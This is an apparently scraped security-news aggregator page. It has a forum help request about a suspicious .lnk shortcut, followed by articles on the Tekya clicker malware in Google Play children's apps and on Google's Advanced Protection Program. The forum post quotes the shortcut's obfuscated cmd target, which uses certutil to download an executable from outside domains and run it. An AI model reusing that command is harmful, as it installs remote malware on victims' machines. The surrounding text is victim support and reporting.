Featured Post

.Lnk file with cmd usage - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputer

Image
.Lnk file with cmd usage - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputer.Lnk file with cmd usage - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputerPosted: 06 Jul 2020 11:33 AM PDT Hi all,Looking for feedback on the likelihood my double clicking of a bad .lnk file caused damage.. When I did double click it, I remember getting a standard windows dialog box. I believe it said the path did not exist or shortcut unavailable.. I'm not finding anything in my startup folder for C:\programdata or my username appdata startup folder...  I ran scans with malwarebytes, Hitman with no results.The .lnk file target was:%ComSpec% /v:on/c(SET V4=/?8ih5Oe0vii2dJ179aaaacabbckbdbhhe=gulches_%PROCESSOR_ARCHITECTURE% !H!&SET H="%USERNAME%.exe"&SET V4adKK47=certutil -urlcache -f https://&IF NOT EXIST !H! (!V4adKK47!izub.fun!V4!||!V4adKK47!de.charineziv.com!V4!&!H!))>nul 2>&1The .lnk file 'start-in' was:"%APPDATA%\Mic…

Android clicker malware infects kids’ games on Google Play Store - SlashGear

Android clicker malware infects kids’ games on Google Play Store - SlashGear


Android clicker malware infects kids’ games on Google Play Store - SlashGear

Posted: 24 Mar 2020 10:34 PM PDT

The COVID-19 pandemic isn't just an opportunity for some to finally embrace the work from home life, it is also an opportunity for hackers to exploit people's newfound dependence on the Internet and apps. Of course, it does seem that it's business as usual for Android users as news of yet another malware sneaking into Google Play Store surfaces. Given how it has targeted even children's games, it's a worrying precedent that needs to be nipped at the bud immediately.

The Tekya malware, as security researches at Check Point Research have called it, surprisingly employs code obfuscation to hide its presence from anti-malware programs, including Google Play Protect. It got through undetected in 56 apps, 24 of which were aimed to keep kids preoccupied and tapping away to their hearts' content.

Unfortunately, that's exactly what this malware wants people to do. Tekya is designed for getting users to clicks on what they think are legitimate actions. Instead, they are clicking ads on Google, Facebook, and others, generating revenue for the malware authors but at the user's expense. Kids, of course, are completely unaware of this as are their parents or guardians who unwittingly download a clone of a game or app.

Check Point goes into more detail about the surprisingly simple method Tekya uses to bypass anti-malware protections. It also lists the 56 apps that were cloned from their originals to trick people into installing previously tested apps. All of these have reportedly been removed already but it does highlight Google Play Store's seemingly never-ending problem.

Google naturally pushes its Play ecosystem, particularly Play Store and Play Protect, as necessary parts of the Android experience. They promise a safe experience that justifies the company's process for certifying phones. Instances like this, however, deal a blow to the platform's credibility, perhaps causing some users to doubt Google Play Store entirely.

Use Google Advanced Protection to Protect Your Family Members From Android Malware - Lifehacker

Posted: 19 Mar 2020 12:05 PM PDT

The Google Play Store unwittingly hosts malicious apps, and it seems like a new batch is discovered every other week. You should be OK as long as you follow basic data security protocols, use a reliable anti-malware service, and are vigilant about removing dangerous apps whenever they're spotted. But here's the thing: These shady app developers and hackers aren't targeting users who keep their devices safe; they're after your friends and family members who don't know the risks (or stubbornly ignore them).

If you know someone who needs an extra layer of protection between them and exploitative apps, or you want to upgrade your own device's security, you should look to look into Google's Advanced Protection Program for Android, which now includes new malware prevention features.

Advertisement

The Advanced Protection Program adds extra security measures for devices and accounts, such as stricter login authentication requirements to prevent account break-ins, anti-phishing features, and restricted access to certain apps and data. As for the new anti-malware security measures, the program now:

  • Prevents devices enrolled in the program from installing non-Play Store apps—that means no more sideloading.
  • Makes Google Play Protect mandatory. Google Play Protect scans Play Store apps for malware before they're installed.
  • Scans all app activity on your device to spot potentially malicious activity.

There are exceptions to these app restrictions, however. Most importantly, some third-party apps and app stores—such as those that come preloaded on your phone or from trusted sources like Samsung—are not affected. Previously sideloaded apps should still work as long they don't trip the Advance Protection system scan, and users can sideload and update certain non-Play Store apps using the ADB tool on PC, but all other forms of sideloading are barred.

How to enroll in Google's Advanced Protection Program

Google's Advanced Protection Program is primarily geared towards high-risk careers, such as journalists, politicians, and other public figures, but it's open to anyone—including your luddite family members who don't understand data-security practices or have trouble discerning potentially harmful apps from real ones. You can enroll your Android device in Google's Advanced Protection Program, or help someone else enroll theirs, using this link.

Advertisement

Signing up requires at least two security keys to complete (your phone can probably serve as one, so you'll only need one more), and the website has several helpful videos to guide you through the process. If your goal is to prevent a loved one from downloading harmful apps, you may want to create an account and add their device so that you're in charge of it—that way they won't disable the protection, lock themselves out of their device, or accidentally change important settings.

Google Play Store distributed malicious ad-fraud apps designed for kids - 2-spyware.com

Posted: 24 Mar 2020 08:25 AM PDT

Tekya malware was downloaded almost 1 million times

Android apps for kids involved in ad fraud

Check Point security researchers found that Android applications designed for kids distributed malware dubbed Tekya.[1] More than 50 apps on the Google Play Store were discovered using a new trick to mimic users clicks on ads.[2] This malware imitated users' actions to click commercial content from advertising networks like Google's AdMob, AppLovin', Facebook, and Unity without the persons' knowledge. Experts also revealed that these malicious apps were downloaded almost 1 million times, researchers[3] say:

Twenty four of the infected apps were aimed at children (ranging from puzzles to racing games), with the rest being utility apps (such as cooking apps, calculators, downloaders, translators, and so on).

These 56 applications included the software that leveraged devices to click on mobile advertisements, so the traffic on those ads and commercial sites is inflated artificially – this is how scammers get to make money from pay-per-click techniques.[4] Applications with titles like Let Me Go and Cooking Delicious attracted kids to download them onto tablets and other mobile devices running Android OS, so the Tekya malware is launched without causing any additional symptoms or asking for special permissions.

Clicker malware simulates users' actions 

Tekya Clicker was hidden in 24 mobile games for children and 32 utility applications, so scammer campaigns could be launched and generate money for criminals. Malware clicked on ads from various sources and embedded cooking, calculator, translation, and similar tools. Even though all applications were removed from the Google Play Store, almost a million downloads were made. 

Once the user installed the malicious application, malware registered a receiver – an Android component that gets invoked when a certain app or system event occurs. It happens when the user is actively using the mobile device, for example, when it restarts. This receiver detects such event and proceeds to load a native library libtekya.so that involves s sub-function which creates and launches touch events. Malware mimics a click via MotionEevent API that was used since last year, and this precise technique that was abused by Tekya Clicker.

Mobile malware and fraudulent ad campaigns on the rise

Advertising campaigns target various devices and people; scammers manage to get their goals achieved by relying on different techniques. Threat actors can plant malware-laced commercial content on user phones and embed malware in apps or online services to generate views, clicks and receive payouts. 

Google tries to protect users from potentially harmful applications, but even partnerships with cybersecurity firms and constant moderation cannot keep users completely secure all the time. Therefore, staying vigilant and employing extra security measures (such as anti-malware for Android) is extremely important when it comes to safety, especially when it comes to kids.

Researchers constantly report on instances when malicious apps act out in the background or even deliver malware.[5] Malicious operators managed to pull out some of these applications from the Google Play Store once they were indicated, and others were removed by Google. If you have any installed, delete them and scan the phone or tablet using AV app to make sure no PUPs were placed on the system without your knowledge.

Comments

Popular Posts

System detected an overrun of a stack-based buffer in this application [FIX] - Windows Report

Valorant anti-cheat lead answers many questions on Reddit - Millenium US